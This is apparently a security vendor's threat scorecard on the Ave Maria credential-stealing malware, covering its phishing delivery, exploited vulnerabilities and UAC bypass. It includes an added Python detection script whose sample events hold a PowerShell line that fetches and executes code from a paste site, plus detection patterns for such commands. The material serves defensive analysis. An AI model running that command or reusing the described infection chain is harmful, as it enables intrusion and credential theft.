Ave Maria
EnigmaSoft Threat Scorecard
EnigmaSoft Threat Scorecards are assessment reports for different malware threats which have been collected and analyzed by our research team. EnigmaSoft Threat Scorecards evaluate and rank threats using several metrics including real-world and potential risk factors, trends, frequency, prevalence, and persistence. EnigmaSoft Threat Scorecards are updated regularly based on our research data and metrics and are useful for a wide range of computer users, from end users seeking solutions to remove malware from their systems to security experts analyzing threats.
EnigmaSoft Threat Scorecards display a variety of useful information, including:
Popularity Rank: The ranking of a particular threat in EnigmaSoft’s Threat Database.
Severity Level: The determined severity level of an object, represented numerically, based on our risk modeling process and research, as explained in our Threat Assessment Criteria.
Infected Computers: The number of confirmed and suspected cases of a particular threat detected on infected computers as reported by SpyHunter.
| Metric | Value |
| --- | --- |
| Threat Level: | 60 % (Medium) |
| Infected Computers: | 322 |
| First Seen: | February 5, 2019 |
| Last Seen: | October 1, 2021 |
| OS(es) Affected: | Windows |
Ave Maria is a piece of malware that was uncovered by cybersecurity researchers relatively recently. It was first spotted in January 2019, when several Italian companies were targeted with it. All of the companies were in the energy sector, specifically oil and gas. Employees of these corporations were targeted through a phishing email campaign. The emails sent to people working at the targeted companies carried attached Microsoft Office files laced with a macro that runs a series of PowerShell commands aimed at deploying Ave Maria's payload and gaining persistence. The Ave Maria malware would exploit a vulnerability in the Microsoft Office Service Pack, tracked as CVE-2017-11882. Through this vulnerability, the attacker can remotely download and execute .exe files on the infiltrated system.
That high-profile companies like the ones targeted in Italy were singled out suggests the attackers are after sensitive data they can extract, which is exactly what the Ave Maria malware is built for. This cunning malware is capable of collecting Web browser passwords; it can even retrieve the encrypted passwords stored by Mozilla Firefox and decrypt them. While in previous campaigns the authors of the Ave Maria malware used the AutoIt scripting language to deploy and initialize their product, they have now opted for an alternative route that relies on a complicated multi-stage attack, which may let them evade detection by some anti-virus products.
The Ave Maria malware was recently employed again. The attackers used the tried and tested method of launching a phishing email campaign. This time, however, the creators of the Ave Maria malware chose a different infection method: a combination of VBScript, PowerShell commands, and obfuscated code hosted on a public text-storage service. PowerShell retrieves the obfuscated data from a popular text-hosting website; the data is then decoded, and this triggers the process responsible for executing Ave Maria.
Once deployed, the Ave Maria malware uses a vulnerability in the Windows component called PkgMgr. Exploiting this vulnerability lets Ave Maria pass through UAC (User Account Control) without interruption, which means the malware's creators gain access to sensitive data that they can collect easily. Once again, the Ave Maria malware targets sensitive information stored in Mozilla Firefox, as well as in any email applications that may be installed on the system.
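The delivery chain described in the paragraphs above (a macro-laced Office document spawning PowerShell, PowerShell fetching obfuscated data from a public text-hosting site and decoding it in memory, then PkgMgr used to slip past UAC) maps onto a handful of process-creation detection rules. The following Python is an added example, not code from EnigmaSoft or SpyHunter; the Sysmon-style field names are an assumption and the sample events are constructed.

```python
"""Detection heuristics for the Ave Maria delivery chain described above: Office
macro -> PowerShell -> payload staged on a public paste site -> decode and execute
-> PkgMgr UAC bypass. Sysmon-style field names are an assumption; events are constructed."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Public text-hosting services commonly abused to stage obfuscated payloads.
PASTE_HOSTS = re.compile(r"https?://(?:[\w-]+\.)*(?:pastebin\.com|paste\.ee|hastebin\.com)", re.I)
# Decode-then-execute idioms typical of obfuscated PowerShell one-liners.
DECODE_EXEC = re.compile(r"FromBase64String|-EncodedCommand|\s-e(?:nc)?\s|Invoke-Expression|\bIEX\b", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the names of the rules one process-creation event triggers."""
    parent, image = basename(event["parent_image"]), basename(event["image"])
    cmd, hits = event["command_line"], []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")     # macro-laced document stage
    if image in SCRIPT_HOSTS and PASTE_HOSTS.search(cmd):
        hits.append("script_host_fetches_paste_site")  # payload staged on a text host
    if image in SCRIPT_HOSTS and DECODE_EXEC.search(cmd):
        hits.append("decode_then_execute")           # obfuscated data decoded in memory
    if image == "pkgmgr.exe" and parent in SCRIPT_HOSTS:
        hits.append("pkgmgr_from_script_host")       # candidate UAC bypass via PkgMgr
    return hits

def triage(events):
    """Index -> rule hits for every event that triggered at least one rule."""
    return {i: h for i, e in enumerate(events) if (h := score_event(e))}

# Constructed sample telemetry: one benign admin command, then two chain stages.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-Service -Name Spooler"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"IEX ((New-Object Net.WebClient)"
                     ".DownloadString('https://pastebin.com/raw/PLACEHOLDER'))\""},
    {"parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\pkgmgr.exe",
     "command_line": "pkgmgr.exe"},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS).items():
        print(idx, hits)
```

Each rule alone produces noise in a real environment; the chain is the signal, so correlate hits from the same host within a short window before alerting.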
The Ave Maria malware is particularly threatening, and companies need to deploy and maintain a high-quality anti-malware suite to keep threats like this away from their servers.